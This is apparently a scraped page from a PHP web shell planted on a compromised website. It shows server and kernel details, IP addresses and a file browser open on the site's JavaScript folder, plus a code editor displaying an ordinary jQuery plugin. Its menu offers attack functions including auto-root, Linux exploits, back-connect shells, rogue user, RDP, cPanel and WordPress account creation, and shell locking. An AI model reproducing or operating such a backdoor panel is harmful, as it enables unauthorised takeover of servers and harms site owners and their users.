Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 172.71.203.95
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
fastspeedlinks.com /
assets /
front /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
appear.js
4.13
KB
-rw-r--r--
bootstrap.min.js
49.54
KB
-rw-r--r--
element-in-view.js
1.49
KB
-rw-r--r--
jquery-ui.js
251.72
KB
-rw-r--r--
jquery.bootstrap-touchspin.js
19.08
KB
-rw-r--r--
jquery.fancybox.js
57.83
KB
-rw-r--r--
jquery.js
94.89
KB
-rw-r--r--
jquery.mCustomScrollbar.concat...
39.6
KB
-rw-r--r--
jquery.paroller.min.js
2.71
KB
-rw-r--r--
main-slider-script.js
5.89
KB
-rw-r--r--
mixitup.js
51
KB
-rw-r--r--
nav-tool.js
1.06
KB
-rw-r--r--
owl.js
41.99
KB
-rw-r--r--
parallax.min.js
16.91
KB
-rw-r--r--
popper.min.js
20.01
KB
-rw-r--r--
script.js
16.54
KB
-rw-r--r--
swiper.min.js
76.48
KB
-rw-r--r--
tilt.jquery.min.js
5.56
KB
-rw-r--r--
typeit.js
12.54
KB
-rw-r--r--
validate.js
20.4
KB
-rw-r--r--
wow.js
6.15
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : element-in-view.js
(function($) { /** * Copyright 2012, Digital Fusion * Licensed under the MIT license. * http://teamdf.com/jquery-plugins/license/ * * @author Sam Sehnert * @desc A small plugin that checks whether elements are within * the user visible viewport of a web browser. * only accounts for vertical position, not horizontal. */ $.fn.visible = function(partial) { var $t = $(this), $w = $(window), viewTop = $w.scrollTop(), viewBottom = viewTop + $w.height(), _top = $t.offset().top, _bottom = _top + $t.height(), compareTop = partial === true ? _bottom : _top, compareBottom = partial === true ? _top : _bottom; return ((compareBottom <= viewBottom) && (compareTop >= viewTop)); }; })(jQuery); $(window).on('scroll', function() { $(".pricing-section-six .pattern-layer, .package-section .image-column .image, .tv-section .image-column .pattern-layer").each(function(i, el) { var el = $(el); if (el.visible(true)) { el.addClass("now-in-view"); } else { el.removeClass("now-in-view"); } }); }); $(document).on('ready', function() { $(".pricing-section-six .pattern-layer, .package-section .image-column .image, .tv-section .image-column .pattern-layer").each(function(i, el) { var el = $(el); if (el.visible(true)) { el.addClass("now-in-view"); } else { el.removeClass("now-in-view"); } }); });
Close